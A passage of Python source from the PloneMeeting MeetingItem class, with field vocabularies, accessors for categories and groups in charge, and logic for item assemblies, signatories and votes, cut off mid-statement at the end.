context=self.REQUEST)),\n (\"emergency_accepted\", translate('emergency_accepted',\n domain=d,\n context=self.REQUEST)),\n (\"emergency_refused\", translate('emergency_refused',\n domain=d,\n context=self.REQUEST)),\n ))\n return res\n\n security.declarePrivate('listCompleteness')\n\n def listCompleteness(self):\n '''Vocabulary for the 'completeness' field.'''\n d = 'PloneMeeting'\n res = DisplayList((\n (\"completeness_not_yet_evaluated\", translate('completeness_not_yet_evaluated',\n 
domain=d,\n context=self.REQUEST)),\n (\"completeness_complete\", translate('completeness_complete',\n domain=d,\n context=self.REQUEST)),\n (\"completeness_incomplete\", translate('completeness_incomplete',\n domain=d,\n context=self.REQUEST)),\n (\"completeness_evaluation_asked_again\", translate('completeness_evaluation_asked_again',\n domain=d,\n context=self.REQUEST)),\n (\"completeness_evaluation_not_required\", translate('completeness_evaluation_not_required',\n domain=d,\n context=self.REQUEST)),\n ))\n return res\n\n security.declarePublic('hasMeeting')\n\n def hasMeeting(self):\n '''Is there a meeting tied to me?'''\n return self.getMeeting(only_uid=True) is not None\n\n security.declarePublic('isLate')\n\n def isLate(self):\n '''Am I a late item?'''\n return bool(self.getListType() == 'late')\n\n security.declarePrivate('getListTypeLateValue')\n\n def getListTypeLateValue(self, meeting):\n '''See doc in interfaces.py.'''\n return 'late'\n\n security.declarePrivate('getListTypeNormalValue')\n\n def getListTypeNormalValue(self, meeting):\n '''See doc in interfaces.py.'''\n return 'normal'\n\n security.declarePrivate('listCategories')\n\n def listCategories(self, classifiers=False):\n '''Returns a DisplayList containing all available active categories in\n the meeting config that corresponds to me.'''\n res = []\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n catType = classifiers and 'classifiers' or 'categories'\n for cat in cfg.getCategories(catType=catType):\n res.append((cat.id, safe_unicode(cat.Title())))\n\n # make sure current category is listed here\n field_name = classifiers and \"classifier\" or \"category\"\n storedKeys = [elt[0] for elt in res]\n current_cat = self.getField(field_name).getAccessor(self)(theObject=True)\n if current_cat and not current_cat.getId() in storedKeys:\n res.append((current_cat.getId(), safe_unicode(current_cat.Title())))\n\n if field_name not in cfg.getItemFieldsToKeepConfigSortingFor():\n # natural sort, reverse the tuples so we have value/key instead of key/value\n # and humansorted may achieve its work\n res = [(elt[1], elt[0]) for elt in res]\n res = humansorted(res)\n res = [(elt[1], elt[0]) for elt in res]\n\n res.insert(0, ('_none_', translate('make_a_choice',\n domain='PloneMeeting',\n context=self.REQUEST)))\n return DisplayList(res)\n\n security.declarePrivate('listClassifiers')\n\n def listClassifiers(self):\n '''Returns a DisplayList containing all available active classifiers in\n the meeting config that corresponds to me.'''\n return self.listCategories(classifiers=True)\n\n
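# Hedged sketch (illustrative only, assuming the module's humansorted\n # import) of the natural-sort trick used in listCategories above: swap\n # (key, value) pairs so humansorted orders by the displayed title, then\n # swap back.\n @staticmethod\n def _demo_humansorted_pairs():\n '''E.g. 'Title 2' naturally sorts before 'Title 10'.'''\n res = [('cat10', 'Title 10'), ('cat2', 'Title 2')]\n res = [(title, key) for key, title in res]\n res = humansorted(res)\n return [(key, title) for title, key in res]\n\n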
security.declarePublic('getCategory')\n\n def getCategory(self, theObject=False, **kwargs):\n '''Overridden accessor to be able to handle parameter p_theObject=False.'''\n cat_id = self.getField('category').get(self, **kwargs)\n return _get_category(self, cat_id, the_object=theObject)\n\n security.declarePublic('getClassifier')\n\n def getClassifier(self, theObject=False, **kwargs):\n '''Overridden accessor to be able to handle parameter p_theObject=False.'''\n cat_id = self.getField('classifier').get(self, **kwargs)\n return _get_category(self, cat_id, the_object=theObject, cat_type=\"classifiers\")\n\n security.declarePublic('getProposingGroup')\n\n def getProposingGroup(self, theObject=False, **kwargs):\n '''This redefined accessor may return the proposing group id or the real\n group if p_theObject is True.'''\n res = self.getField('proposingGroup').get(self, **kwargs)  # = group id\n if res and theObject:\n res = uuidToObject(res, unrestricted=True)\n return res\n\n def getPreferredMeeting(self, theObject=False, caching=True, **kwargs):\n '''This redefined accessor may return the preferred meeting id or\n the real meeting if p_theObject is True.'''\n res = self.getField('preferredMeeting').get(self, **kwargs)\n if theObject:\n meeting_uid = res\n res = None\n if meeting_uid and meeting_uid != ITEM_NO_PREFERRED_MEETING_VALUE:\n preferred_meeting_path = getattr(self, 'preferred_meeting_path', None)\n if preferred_meeting_path:\n if caching and hasattr(self, \"REQUEST\"):\n res = self.REQUEST.get('preferred_meeting__%s' % meeting_uid)\n if not res:\n portal = api.portal.get()\n res = portal.unrestrictedTraverse(preferred_meeting_path)\n if caching and hasattr(self, \"REQUEST\"):\n self.REQUEST.set('preferred_meeting__%s' % meeting_uid, res)\n return res\n\n security.declarePublic('getGroupsInCharge')\n\n def getGroupsInCharge(self,\n theObjects=False,\n fromOrgIfEmpty=False,\n fromCatIfEmpty=False,\n first=False,\n includeAuto=True,\n **kwargs):\n '''Redefine field MeetingItem.groupsInCharge accessor to be able to return\n groupsInCharge ids or the real orgs if p_theObjects is True.\n Default behaviour is to get the orgs stored in the groupsInCharge field.\n If p_first is True, we only return the first group in charge.\n If p_includeAuto is True, we will include auto computed groupsInCharge,\n so groupsInCharge defined in proposingGroup and category.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n\n res = list(self.getField('groupsInCharge').get(self, **kwargs))  # = org_uid\n\n if (not res and fromOrgIfEmpty) or \\\n (includeAuto and cfg.getIncludeGroupsInChargeDefinedOnProposingGroup()):\n proposingGroup = self.getProposingGroup(theObject=True)\n # maybe an item template defined in the MeetingConfig?\n if proposingGroup:\n org_groups_in_charge = [\n gic_uid for gic_uid in proposingGroup.get_groups_in_charge()\n if gic_uid not in res]\n if org_groups_in_charge:\n res += list(org_groups_in_charge)\n\n if (not res and fromCatIfEmpty) or \\\n (includeAuto and cfg.getIncludeGroupsInChargeDefinedOnCategory()):\n # consider category and classifier\n categories = []\n category = self.getCategory(theObject=True)\n if category:\n categories.append(category)\n classifier = self.getClassifier(theObject=True)\n if classifier:\n categories.append(classifier)\n for cat in categories:\n cat_groups_in_charge = [\n gic_uid for gic_uid in cat.get_groups_in_charge()\n if gic_uid not in res]\n if cat_groups_in_charge:\n res += list(cat_groups_in_charge)\n\n # avoid getting every organization if first=True\n if res and first and theObjects:\n res = [res[0]]\n\n if theObjects:\n res = uuidsToObjects(res, ordered=True, unrestricted=True)\n\n if res and first:\n res = res[0]\n\n return res\n\n security.declarePublic('getAssociatedGroups')\n\n def getAssociatedGroups(self, theObjects=False, **kwargs):\n '''This redefined accessor may return associated group ids or the real\n groups if p_theObjects is True.'''\n res = self.getField('associatedGroups').get(self, **kwargs)\n if res and theObjects:\n return tuple(uuidsToObjects(uuids=res, ordered=True, unrestricted=True))\n return res\n\n security.declarePublic('fieldIsEmpty')\n\n def fieldIsEmpty(self, name):\n '''Is field named p_name empty ?'''\n return fieldIsEmpty(name, self)\n\n security.declarePublic('wfConditions')\n\n def wfConditions(self):\n '''Returns the adapter that implements the interface that proposes\n methods for use as 
conditions in the workflow associated with this\n item.'''\n return getWorkflowAdapter(self, conditions=True)\n\n security.declarePublic('wfActions')\n\n def wfActions(self):\n '''Returns the adapter that implements the interface that proposes\n methods for use as actions in the workflow associated with this\n item.'''\n return getWorkflowAdapter(self, conditions=False)\n\n security.declarePublic('adapted')\n\n def adapted(self):\n '''Gets the \"adapted\" version of myself. If no custom adapter is found,\n this method returns me.'''\n return getCustomAdapter(self)\n\n security.declarePublic('hasHistory')\n\n def hasHistory(self, fieldName=None):\n '''See doc in utils.py.'''\n return hasHistory(self, fieldName)\n\n def attribute_is_used_cachekey(method, self, name):\n '''cachekey method for self.attribute_is_used.'''\n return \"{0}.{1}\".format(self.portal_type, name)\n\n security.declarePublic('attribute_is_used')\n\n @ram.cache(attribute_is_used_cachekey)\n def attribute_is_used(self, name):\n '''Is the attribute named p_name used in this meeting config ?'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return (name in cfg.getUsedItemAttributes())\n\n def query_state_cachekey(method, self):\n '''cachekey method for self.query_state.'''\n return getattr(aq_base(self), 'workflow_history', {})\n\n security.declarePublic('query_state')\n\n # not ram.cached: perf tests say it does not change anything\n # and it avoids a useless entry in the cache\n # @ram.cache(query_state_cachekey)\n def query_state(self):\n '''In what state am I ?'''\n wfTool = api.portal.get_tool('portal_workflow')\n return wfTool.getInfoFor(self, 'review_state')\n\n security.declarePublic('getSelf')\n\n def getSelf(self):\n '''All MeetingItem methods that are overridable through a custom adapter\n can't make the assumption that p_self corresponds to a MeetingItem\n instance. Indeed, p_self may correspond to an adapter instance. 
Those\n methods can retrieve the MeetingItem instance through a call to\n m_getSelf.'''\n res = self\n if self.getTagName() != 'MeetingItem':\n res = self.context\n return res\n\n def _may_update_item_reference(self):\n '''See docstring in interfaces.py.'''\n may_update = False\n item = self.getSelf()\n if item.hasMeeting():\n may_update = True\n else:\n # manage reference for items out of meeting\n tool = api.portal.get_tool(\"portal_plonemeeting\")\n cfg = tool.getMeetingConfig(item)\n may_update = cfg.getComputeItemReferenceForItemsOutOfMeeting()\n return may_update\n\n security.declarePublic('update_item_reference')\n\n def update_item_reference(self, clear=False):\n '''Update the item reference: recompute it,\n store it and reindex 'getItemReference'.\n This relies on _may_update_item_reference.'''\n res = ''\n if not clear and self.adapted()._may_update_item_reference():\n meeting = self.getMeeting()\n extra_expr_ctx = _base_extra_expr_ctx(self)\n extra_expr_ctx.update({'item': self, 'meeting': meeting})\n cfg = extra_expr_ctx['cfg']\n # default raise_on_error=False so if the expression\n # raises an error, we will get '' for reference and a message in the log\n res = _evaluateExpression(self,\n expression=cfg.getItemReferenceFormat().strip(),\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx)\n # make sure we do not have None\n res = res or ''\n\n stored = self.getField('itemReference').get(self)\n if stored != res:\n self.setItemReference(res)\n idxs = self.adapted().getIndexesRelatedTo('item_reference')\n if idxs:\n # avoid update_metadata, we do not need to update modified either\n reindex_object(self, idxs=idxs, update_metadata=0)\n return res\n\n def update_groups_in_charge(self):\n \"\"\"When MeetingConfig.includeGroupsInChargeDefinedOnProposingGroup or\n MeetingConfig.includeGroupsInChargeDefinedOnCategory is used,\n if MeetingItem.groupsInCharge is empty or\n \"need_MeetingItem_update_groups_in_charge_xxx\" is found in REQUEST,\n we will store the corresponding groupsInCharge.\"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n gic_from_cat = cfg.getIncludeGroupsInChargeDefinedOnCategory()\n gic_from_pg = cfg.getIncludeGroupsInChargeDefinedOnProposingGroup()\n if (gic_from_cat or gic_from_pg) and \\\n (not self.groupsInCharge or\n (self.REQUEST.get('need_MeetingItem_update_groups_in_charge_category') and\n gic_from_cat) or\n (self.REQUEST.get('need_MeetingItem_update_groups_in_charge_classifier') and\n gic_from_cat) or\n (self.REQUEST.get('need_MeetingItem_update_groups_in_charge_proposing_group') and\n gic_from_pg)):\n # empty the groups_in_charge before updating it because\n # it is taken into account by getGroupsInCharge\n self.setGroupsInCharge([])\n groups_in_charge = self.getGroupsInCharge(includeAuto=True)\n self.setGroupsInCharge(groups_in_charge)\n\n
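# Hedged sketch (illustrative only) of the REQUEST-marker pattern used\n # by the mutators and the update_* methods above: a mutator flags the\n # change in the REQUEST and the flag is read once the whole edit has\n # been processed.\n def _demo_request_marker(self):\n '''Set then read one of the real marker keys used by setClassifier\n and friends.'''\n marker = 'need_MeetingItem_update_groups_in_charge_classifier'\n self.REQUEST.set(marker, True)\n return bool(self.REQUEST.get(marker))\n\n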
def update_committees(self):\n \"\"\"Update committees automatically?\n This will be the case if :\n - \"committees\" field used;\n - no committees selected on the item or a parameter of the item changed;\n - the item is not inserted into a meeting\n (this avoids changing old items if the configuration changed).\"\"\"\n indexes = []\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # warning, \"committees\" is in MeetingConfig.usedMeetingAttributes\n if \"committees\" in cfg.getUsedMeetingAttributes() and \\\n (not self.getCommittees() or self.REQUEST.get('need_MeetingItem_update_committees')) and \\\n not self.hasMeeting():\n if cfg.is_committees_using(\"auto_from\"):\n committees = []\n for committee in cfg.getCommittees(only_enabled=True):\n if \"proposing_group__\" + self.getProposingGroup() in committee[\"auto_from\"] or \\\n \"category__\" + self.getCategory() in committee[\"auto_from\"] or \\\n \"classifier__\" + self.getClassifier() in committee[\"auto_from\"]:\n committees.append(committee['row_id'])\n committees = committees or [NO_COMMITTEE]\n # only set committees if value changed\n if self.getCommittees() != committees:\n self.setCommittees(committees)\n indexes.append('committees_index')\n return indexes\n\n security.declarePublic('hasItemSignatures')\n\n def hasItemSignatures(self):\n '''Does this item define specific item signatures ?'''\n return bool(self.getField('itemSignatures').get(self))\n\n security.declarePublic('getCertifiedSignatures')\n\n def getCertifiedSignatures(self,\n forceUseCertifiedSignaturesOnMeetingConfig=False,\n from_group_in_charge=False,\n listify=True):\n '''See docstring in interfaces.py.'''\n item = self.getSelf()\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n if forceUseCertifiedSignaturesOnMeetingConfig:\n return cfg.getCertifiedSignatures(computed=True, listify=listify)\n\n selected_group_in_charge = None\n if from_group_in_charge:\n selected_group_in_charge = item.getGroupsInCharge(\n theObjects=True, fromOrgIfEmpty=True, fromCatIfEmpty=True, first=True)\n # get certified signatures computed, this will return a list with pairs\n # of function/signatures, so ['function1', 'name1', 'function2', 'name2', 'function3', 'name3', ]\n # this list is ordered by signature number defined on the organization/MeetingConfig\n return item.getProposingGroup(theObject=True).get_certified_signatures(\n computed=True, cfg=cfg, group_in_charge=selected_group_in_charge, listify=listify)\n\n def is_assembly_field_used(self, field_name):\n \"\"\"Helper method that returns True if an assembly field is used\n or if it is filled (no longer used, switched to contacts, but filled on old items).\"\"\"\n res = False\n if self.hasMeeting():\n meeting = self.getMeeting()\n attr_names_mapping = {\"itemAssembly\": \"assembly\",\n \"itemAssemblyExcused\": \"assembly_excused\",\n \"itemAssemblyAbsents\": \"assembly_absents\",\n \"itemAssemblyGuests\": \"assembly_guests\",\n \"itemSignatures\": \"signatures\"}\n if meeting.attribute_is_used(attr_names_mapping[field_name]):\n res = True\n else:\n # maybe it was used before?\n accessor = self.getField(field_name).getAccessor(self)\n if accessor(real=True) or accessor(real=False):\n res = True\n return res\n\n security.declarePublic('redefinedItemAssemblies')\n\n def redefinedItemAssemblies(self):\n '''\n Helper method that returns the list of redefined assembly attributes if\n the assembly of the item has been redefined; this is used on the item view. 
Depending on the used item attributes (assembly, excused, absents, guests),\n each redefined attribute is appended to the returned list.\n '''\n res = []\n # check if assembly redefined\n if self.getItemAssembly(real=True):\n res.append('assembly')\n if self.getItemAssemblyExcused(real=True):\n res.append('assembly_excused')\n if self.getItemAssemblyAbsents(real=True):\n res.append('assembly_absents')\n if self.getItemAssemblyGuests(real=True):\n res.append('assembly_guests')\n # when using contacts\n if self.get_item_absents(the_objects=True):\n res.append('item_absents')\n if self.get_item_excused(the_objects=True):\n res.append('item_excused')\n if self.get_item_non_attendees(the_objects=True):\n res.append('item_non_attendees')\n return res\n\n security.declarePublic('getItemAssembly')\n\n def getItemAssembly(self,\n real=False,\n for_display=True,\n striked=True,\n mark_empty_tags=False,\n **kwargs):\n '''Returns the assembly for this item.\n If no assembly is defined, the meeting assembly is returned.'''\n res = self.getField('itemAssembly').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_assembly(for_display=False)\n # make sure we always have unicode,\n # Meeting stores unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = render_textarea(\n res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('getItemAssemblyExcused')\n\n def getItemAssemblyExcused(self,\n real=False,\n for_display=True,\n striked=True,\n mark_empty_tags=False,\n **kwargs):\n '''Returns the assembly excused for this item.\n If no excused are defined for the item, the meeting assembly excused are returned.'''\n res = self.getField('itemAssemblyExcused').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_assembly_excused(for_display=False)\n # make sure we always have unicode,\n # Meeting stores unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = render_textarea(res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('getItemAssemblyAbsents')\n\n def getItemAssemblyAbsents(self,\n real=False,\n for_display=True,\n striked=True,\n mark_empty_tags=False,\n **kwargs):\n '''Returns the assembly absents for this item.\n If no absents are defined for the item, the meeting assembly absents are returned.'''\n res = self.getField('itemAssemblyAbsents').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_assembly_absents(for_display=False)\n # make sure we always have unicode,\n # Meeting stores unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = render_textarea(res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('getItemAssemblyGuests')\n\n def getItemAssemblyGuests(self,\n real=False,\n for_display=True,\n striked=True,\n mark_empty_tags=False,\n **kwargs):\n '''Returns the assembly guests for this item.\n If no guests are defined for the item, the meeting assembly guests are returned.'''\n res = self.getField('itemAssemblyGuests').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_assembly_guests(for_display=False)\n # make sure we always have unicode,\n # Meeting stores unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = 
render_textarea(res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('getItemSignatures')\n\n def getItemSignatures(self,\n real=False,\n for_display=False,\n striked=False,\n mark_empty_tags=False,\n **kwargs):\n '''Gets the signatures for this item. If no signature is defined,\n meeting signatures are returned.'''\n res = self.getField('itemSignatures').getRaw(self, **kwargs)\n if not real and not res and self.hasMeeting():\n res = self.getMeeting().get_signatures(for_display=False)\n # make sure we always have unicode,\n # Meeting stores unicode and MeetingItem stores utf-8\n res = safe_unicode(res)\n if res and for_display:\n res = render_textarea(res, self, striked=striked, mark_empty_tags=mark_empty_tags)\n return res\n\n security.declarePublic('get_item_absents')\n\n def get_item_absents(self, the_objects=False, ordered=True, **kwargs):\n '''Gets the absents for this item.\n Absents for an item are stored in the Meeting.item_absents dict.'''\n if not self.hasMeeting():\n return []\n meeting = self.getMeeting()\n meeting_item_absents = meeting.get_item_absents().get(self.UID(), [])\n if ordered:\n meeting_item_absents = self._order_contacts(meeting_item_absents)\n if the_objects:\n item_absents = meeting._get_contacts(uids=meeting_item_absents, the_objects=the_objects)\n else:\n item_absents = tuple(meeting_item_absents)\n return item_absents\n\n security.declarePublic('get_item_excused')\n\n def get_item_excused(self, the_objects=False, ordered=True, **kwargs):\n '''Gets the excused for this item.\n Excused for an item are stored in the Meeting.item_excused dict.'''\n if not self.hasMeeting():\n return []\n meeting = self.getMeeting()\n meeting_item_excused = meeting.get_item_excused().get(self.UID(), [])\n if ordered:\n meeting_item_excused = self._order_contacts(meeting_item_excused)\n if the_objects:\n item_excused = meeting._get_contacts(uids=meeting_item_excused, the_objects=the_objects)\n else:\n item_excused = tuple(meeting_item_excused)\n return item_excused\n\n security.declarePublic('get_item_non_attendees')\n\n def get_item_non_attendees(self, the_objects=False, ordered=True, **kwargs):\n '''Gets the non_attendees for this item.\n Non attendees for an item are stored in the Meeting.item_non_attendees dict.'''\n if not self.hasMeeting():\n return []\n meeting = self.getMeeting()\n meeting_item_non_attendees = meeting.get_item_non_attendees().get(self.UID(), [])\n if ordered:\n meeting_item_non_attendees = self._order_contacts(meeting_item_non_attendees)\n if the_objects:\n item_non_attendees = meeting._get_contacts(\n uids=meeting_item_non_attendees, the_objects=the_objects)\n else:\n item_non_attendees = tuple(meeting_item_non_attendees)\n return item_non_attendees\n\n security.declarePublic('get_item_signatories')\n\n def get_item_signatories(self,\n the_objects=False,\n by_signature_number=False,\n real=False,\n include_position_type=False,\n **kwargs):\n '''Returns the signatories for this item. 
If no signatory is defined,\n meeting signatories are returned.\n If p_the_objects=False, the returned result is a dict with\n the signatory uid as key and 'signature_number' as value.\n Else, the key is the signatory contact object.\n '''\n signatories = {}\n if not self.hasMeeting():\n return signatories\n meeting = self.getMeeting()\n if not real:\n # we could have several signatories having the same signature_number\n # this is the case when having a signatory replacer on some items\n # we may define for example 2 signatories \"2\" and use them on specific items\n signatories = meeting.get_signatories(by_signature_number=False)\n # keep signatories that are attendees for this item\n # keep order so we may have 2 signatories 2 present and the first wins\n # we reverse attendees order so when reversing key/values here under\n # the second same signature number is actually the first\n attendees = reversed(self.get_attendees())\n signatories = OrderedDict([(k, signatories[k]) for k in attendees\n if k in signatories])\n # reverse as keys were signatory UID, we want signature_number\n signatories = {v: k for k, v in signatories.items()}\n\n item_signatories = meeting.get_item_signatories().get(self.UID(), {})\n signatories.update(item_signatories)\n\n if the_objects:\n uids = signatories.values()\n signatories_objs = meeting._get_contacts(uids=uids, the_objects=the_objects)\n reversed_signatories = {v: k for k, v in signatories.items()}\n signatories = {reversed_signatories[signatory.UID()]: signatory\n for signatory in signatories_objs}\n\n # finally if include_position_type=True, complete data\n if include_position_type:\n item_signatories = meeting.get_item_signatories(include_position_type=True).get(\n self.UID(), {})\n for signature_number, uid_or_obj in signatories.items():\n signatories[signature_number] = {\n 'hp': uid_or_obj,\n 'position_type': item_signatories[signature_number]['position_type']\n if signature_number in item_signatories else\n (uid_or_obj.position_type if the_objects else\n uuidToObject(uid_or_obj).position_type)}\n # finally change k/v if necessary\n if not by_signature_number:\n if not include_position_type:\n signatories = {v: k for k, v in signatories.items()}\n else:\n signatories = {v['hp']: {'signature_number': k, 'position_type': v['position_type']}\n for k, v in signatories.items()}\n\n return signatories\n\n def get_votes_are_secret(self):\n \"\"\"Are votes secret on this item (based on pollType)?\"\"\"\n return bool(self.getPollType().startswith('secret'))\n\n def get_vote_is_secret(self, vote_number):\n \"\"\"Is vote p_vote_number secret (based on its stored poll_type)?\"\"\"\n item_votes = self.getMeeting().get_item_votes().get(self.UID(), [])\n if len(item_votes) - 1 >= vote_number:\n poll_type = item_votes[vote_number].get('poll_type', self.getPollType())\n else:\n poll_type = self.getPollType()\n return poll_type.startswith('secret')\n\n
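# Hedged sketch (illustrative only) of the \"first attendee wins\" trick\n # used in get_item_signatories above: attendees are reversed before\n # building the OrderedDict so that, once the mapping is inverted to\n # {signature_number: uid}, the first attendee holding a duplicated\n # signature number is the one kept.\n @staticmethod\n def _demo_first_signatory_wins():\n '''E.g. two attendees both holding signature number '2'.'''\n attendees = ['hp1', 'hp2']\n signatories = {'hp1': '2', 'hp2': '2'}\n by_uid = OrderedDict((uid, signatories[uid])\n for uid in reversed(attendees) if uid in signatories)\n # later entries overwrite earlier ones when inverting\n return {v: k for k, v in by_uid.items()}  # {'2': 'hp1'}\n\n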
def _build_unexisting_vote(self,\n is_secret,\n vote_number,\n poll_type,\n voter_uids=[],\n include_extra_infos=True):\n '''Build the default data structure for a vote that is not stored yet.'''\n if is_secret:\n votes = [{'label': None,\n 'votes': {},\n 'linked_to_previous': vote_number != 0 and self.REQUEST.get(\n 'form.widgets.linked_to_previous', False) or False}]\n if include_extra_infos:\n votes[0]['vote_number'] = 0\n votes[0]['poll_type'] = poll_type\n # initialize the count to 0 for every used vote value\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n for used_vote in cfg.getUsedVoteValues():\n votes[0]['votes'][used_vote] = 0\n else:\n votes = [\n {\n 'label': None,\n 'voters': {},\n 'linked_to_previous': vote_number != 0 and self.REQUEST.get(\n 'form.widgets.linked_to_previous', False) or False}]\n if include_extra_infos:\n votes[0]['vote_number'] = 0\n votes[0]['poll_type'] = poll_type\n # define vote not encoded for every voter\n for voter_uid in voter_uids:\n votes[0]['voters'][voter_uid] = NOT_ENCODED_VOTE_VALUE\n return votes\n\n security.declarePublic('get_item_votes')\n\n def get_item_votes(self,\n vote_number='all',\n include_extra_infos=True,\n include_unexisting=True,\n unexisting_value=NOT_ENCODED_VOTE_VALUE,\n ignored_vote_values=[],\n force_list_result=False):\n '''p_vote_number may be 'all' (default), returning a list of every votes,\n or an integer like 0, returning the vote with the given number.\n If p_include_extra_infos, for convenience, some extra infos\n ('vote_number', 'linked_to_previous' and 'poll_type')\n are added to the returned value.\n If p_include_unexisting, will return p_unexisting_value for votes that\n do not exist, so when votes were just enabled, a new voter selected, ...'''\n votes = []\n if not self.hasMeeting():\n return votes\n meeting = self.getMeeting()\n item_votes = meeting.get_item_votes().get(self.UID(), [])\n voter_uids = self.get_item_voters()\n poll_type = self.getPollType()\n # all votes\n if vote_number == 'all':\n # votes will be a list\n votes = deepcopy(item_votes)\n if include_extra_infos:\n # add a 'vote_number' key into the result for convenience\n i = 0\n for vote_infos in votes:\n vote_infos['vote_number'] = i\n vote_infos['linked_to_previous'] = vote_infos.get('linked_to_previous', False)\n vote_infos['poll_type'] = vote_infos.get('poll_type', poll_type)\n i += 1\n # vote_number\n elif len(item_votes) - 1 >= vote_number:\n votes.append(item_votes[vote_number])\n\n # secret votes\n if self.get_vote_is_secret(vote_number):\n if include_unexisting and not votes:\n votes = self._build_unexisting_vote(True, vote_number, poll_type)\n # public votes\n else:\n # add an empty vote in case nothing in itemVotes\n # this is useful when no votes encoded, new voters selected, ...\n if include_unexisting:\n # first or not existing\n if not votes:\n votes = self._build_unexisting_vote(False, vote_number, poll_type)\n\n i = 0 if vote_number == 'all' else vote_number\n for vote in votes:\n if not self.get_vote_is_secret(i):\n # add new values if some voters were added\n stored_voter_uids = vote['voters'].keys()\n for voter_uid in voter_uids:\n if voter_uid not in stored_voter_uids:\n vote['voters'][voter_uid] = NOT_ENCODED_VOTE_VALUE\n # make sure we only have current voters in 'voters'\n # this may not be the case when encoding votes\n # for a voter then setting him absent\n # discard also ignored_vote_values\n vote['voters'] = OrderedDict(\n [(vote_voter_uid, vote['voters'][vote_voter_uid])\n for vote_voter_uid in voter_uids\n if (not ignored_vote_values or\n vote['voters'][vote_voter_uid] not in ignored_vote_values)])\n i = i + 1\n\n # when asking a vote_number, only return this one as a dict, not as a list\n if votes and vote_number != 'all' and not force_list_result:\n votes = votes[0]\n return votes\n\n def get_voted_voters(self, vote_number='all'):\n '''Voter uids that actually voted on this item, relevant for public votes.'''\n item_votes = self.get_item_votes(\n vote_number=vote_number,\n ignored_vote_values=[NOT_ENCODED_VOTE_VALUE],\n force_list_result=True)\n voted_voters = []\n for vote in item_votes:\n voters = vote.get('voters', {}).keys()\n voted_voters += voters\n return tuple(set(voted_voters))\n\n
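# Hedged illustration (made-up values, not from the original source) of\n # the shape of a public vote entry as returned by get_item_votes(0)\n # with extra infos included.\n def _demo_public_vote_shape(self):\n '''One public vote where one voter voted and one did not yet.'''\n return {'label': None,\n 'vote_number': 0,\n 'poll_type': 'freehand',\n 'linked_to_previous': False,\n 'voters': {'hp1-uid': 'yes',\n 'hp2-uid': NOT_ENCODED_VOTE_VALUE}}\n\n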
security.declarePublic('get_item_voters')\n\n def get_item_voters(self, theObjects=False):\n '''Return held positions able to vote on the current item.\n By default, held_position UIDs are returned.\n If p_theObjects=True, held_position objects are returned.'''\n meeting = self.getMeeting()\n attendee_uids = self.get_attendees() or None\n voters = meeting.get_voters(uids=attendee_uids, the_objects=theObjects)\n return voters\n\n def _voteIsDeletable(self, vote_number):\n '''Return True if vote p_vote_number may be deleted.'''\n res = False\n item_votes = self.getMeeting().get_item_votes().get(self.UID())\n if item_votes:\n vote_infos = item_votes[vote_number]\n if vote_infos['linked_to_previous'] or \\\n not next_vote_is_linked(item_votes, vote_number):\n res = True\n return res\n\n def get_in_and_out_attendees(self, ignore_before_first_item=True, the_objects=True):\n \"\"\"Returns a dict with information about assembly moves :\n - who left at the beginning of the item;\n - who entered at the beginning of the item;\n - who left at the end of the item;\n - who entered at the end of the item.\n \"\"\"\n res = {'left_before': (),\n 'entered_before': (),\n 'left_after': (),\n 'entered_after': (),\n 'non_attendee_before': (),\n 'attendee_again_before': (),\n 'non_attendee_after': (),\n 'attendee_again_after': ()}\n meeting = self.getMeeting()\n if meeting:\n items = meeting.get_items(ordered=True, unrestricted=True)\n item_index = items.index(self)\n previous = None\n # only fill a value if the attendee is present for the current item\n # this manages the fact that an attendee may be absent for an item,\n # then not attendee for the next item\n attendees = self.get_attendees(the_objects=the_objects)\n absents = self.get_item_absents(the_objects=the_objects)\n excused = self.get_item_excused(the_objects=the_objects)\n non_attendees = self.get_item_non_attendees(the_objects=the_objects)\n if item_index:\n previous = items[item_index - 1]\n # before absents/excused\n previous_attendees = previous.get_attendees(the_objects=the_objects)\n previous_absents = previous.get_item_absents(the_objects=the_objects)\n previous_excused = previous.get_item_excused(the_objects=the_objects)\n left_before = tuple(set(absents + excused).intersection(\n set(previous_attendees)))\n entered_before = tuple(set(previous_absents + previous_excused).intersection(\n set(attendees)))\n res['left_before'] = left_before\n res['entered_before'] = entered_before\n # non attendees\n previous_non_attendees = previous.get_item_non_attendees(the_objects=the_objects)\n non_attendee_before = tuple(set(non_attendees).intersection(\n set(previous_attendees)))\n attendee_again_before = tuple(set(previous_non_attendees).intersection(\n set(attendees)))\n res['non_attendee_before'] = non_attendee_before\n res['attendee_again_before'] = attendee_again_before\n elif not ignore_before_first_item:\n # self is the first item\n res['left_before'] = absents + excused\n res['non_attendee_before'] = non_attendees\n next = None\n if self != items[-1]:\n next = items[item_index + 1]\n # after absents/excused\n next_attendees = next.get_attendees(the_objects=the_objects)\n next_absents = next.get_item_absents(the_objects=the_objects)\n next_excused = next.get_item_excused(the_objects=the_objects)\n next_non_attendees = next.get_item_non_attendees(the_objects=the_objects)\n left_after = 